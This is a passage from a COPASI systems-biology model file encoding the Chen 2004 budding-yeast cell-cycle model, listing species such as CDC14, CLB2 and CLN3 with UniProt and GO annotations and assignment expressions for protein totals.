<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_41">
<CopasiMT:isVersionOf rdf:resource="urn:miriam:obo.go:GO%3A0007114" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_37" name="C2" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_37">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P24868" />
<rdf:li rdf:resource="urn:miriam:uniprot:P24869" />
<rdf:li rdf:resource="urn:miriam:uniprot:P38634" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_33" name="C2P" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_33">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P24868" />
<rdf:li rdf:resource="urn:miriam:uniprot:P24869" />
<rdf:li rdf:resource="urn:miriam:uniprot:P38634" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_29" name="C5" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_29">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P30283" />
<rdf:li rdf:resource="urn:miriam:uniprot:P32943" />
<rdf:li rdf:resource="urn:miriam:uniprot:P38634" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_25" name="C5P" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_25">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P30283" />
<rdf:li rdf:resource="urn:miriam:uniprot:P32943" />
<rdf:li rdf:resource="urn:miriam:uniprot:P38634" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_21" name="CDC14" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_21">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:Q00684" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_17" name="CDC14T" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_17">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:Q00684" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC14],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[RENT],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[RENTP],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_13" name="CDC15" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_13">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P27636" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_9" name="CDC15i" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_9">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P27636" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[CDC15T],Reference=Value>-<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC15],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_5" name="CDC20" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_5">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:07:02Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P26309" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_1" name="CDC20i" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_1">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:07:04Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P26309" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_77" name="CDC6" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_77">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:07:08Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P09119" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_79" name="CDC6P" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_79">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P09119" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_81" name="CDC6T" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_81">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P09119" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F5],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F2P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F5P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_83" name="CDH1" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_83">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P53197" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_85" name="CDH1i" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_85">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:07:09Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P53197" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_87" name="CKIT" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_87">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P09119" />
<rdf:li rdf:resource="urn:miriam:uniprot:P38634" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[SIC1T],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CDC6T],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_89" name="CLB2" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_89">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P24868" />
<rdf:li rdf:resource="urn:miriam:uniprot:P24869" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_91" name="CLB2T" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_91">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:07:18Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P24868" />
<rdf:li rdf:resource="urn:miriam:uniprot:P24869" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C2P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F2P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_93" name="CLB5" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_93">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:07:16Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P30283" />
<rdf:li rdf:resource="urn:miriam:uniprot:P32943" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_95" name="CLB5T" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_95">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P30283" />
<rdf:li rdf:resource="urn:miriam:uniprot:P32943" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB5],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C5],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[C5P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F5],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[F5P],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_97" name="CLN2" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_97">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P20437" />
<rdf:li rdf:resource="urn:miriam:uniprot:P20438" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_99" name="CLN3" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_99">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:38:46Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P13365" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[C0],Reference=Value>*<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Dn3],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MASS],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jn3],Reference=Value>+<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Dn3],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[MASS],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>))/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_101" name="ESP1" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_101">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:Q03018" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_103" name="F2" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_103">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P09119" />
<rdf:li rdf:resource="urn:miriam:uniprot:P24868" />
<rdf:li rdf:resource="urn:miriam:uniprot:P24869" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_105" name="F2P" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_105">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2011-02-21T01:09:19Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P09119" />
<rdf:li rdf:resource="urn:miriam:uniprot:P24868" />
<rdf:li rdf:resource="urn:miriam:uniprot:P24869" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_107" name="F5" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_107">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P09119" />
<rdf:li rdf:resource="urn:miriam:uniprot:P30283" />
<rdf:li rdf:resource="urn:miriam:uniprot:P32943" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_109" name="F5P" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_109">
<CopasiMT:hasPart>
<rdf:Bag>
<rdf:li rdf:resource="urn:miriam:uniprot:P09119" />
<rdf:li rdf:resource="urn:miriam:uniprot:P30283" />
<rdf:li rdf:resource="urn:miriam:uniprot:P32943" />
</rdf:Bag>
</CopasiMT:hasPart>
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_111" name="IE" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_111">
<CopasiMT:is rdf:resource="urn:miriam:obo.go:GO%3A0005680" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[IET],Reference=Value>-<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[IEP],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_113" name="IEP" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_113">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:23:39Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:obo.go:GO%3A0005680" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_115" name="LTE1" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_115">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:07:22Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P07866" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_117" name="MAD2" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_117">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:07:27Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P40958" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_119" name="MASS" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_119">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:23:43Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:obo.go:GO%3A0016049" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_121" name="MCM1" simulationType="assignment" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:dcterms="http://purl.org/dc/terms/" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_121">
<dcterms:created>
<rdf:Description>
<dcterms:W3CDTF>2010-08-05T16:23:43Z</dcterms:W3CDTF>
</rdf:Description>
</dcterms:created>
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P11746" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
<Expression>
GK(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kamcm],Reference=Value>*(<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Vector=Metabolites[CLB2],Reference=ParticleNumber>/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[amount to particle factor],Reference=Value>),<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[kimcm],Reference=Value>,<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jamcm],Reference=Value>,<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Values[Jimcm],Reference=Value>)/<CN=Root,Model=Chen2004_CellCycle Mother with GLU,Vector=Compartments[cell],Reference=Volume>
</Expression>
</Metabolite>
<Metabolite key="Metabolite_123" name="NET1" simulationType="reactions" compartment="Compartment_3">
<MiriamAnnotation>
<rdf:RDF xmlns:CopasiMT="http://www.copasi.org/RDF/MiriamTerms#" xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">
<rdf:Description rdf:about="#Metabolite_123">
<CopasiMT:is rdf:resource="urn:miriam:uniprot:P47035" />
</rdf:Description>
</rdf:RDF>
</MiriamAnnotation>
</Metabolite>
<Metabolite key="Metabolite_125" name="NET1P" simulationType="reactions" compartment="Compartment_3">
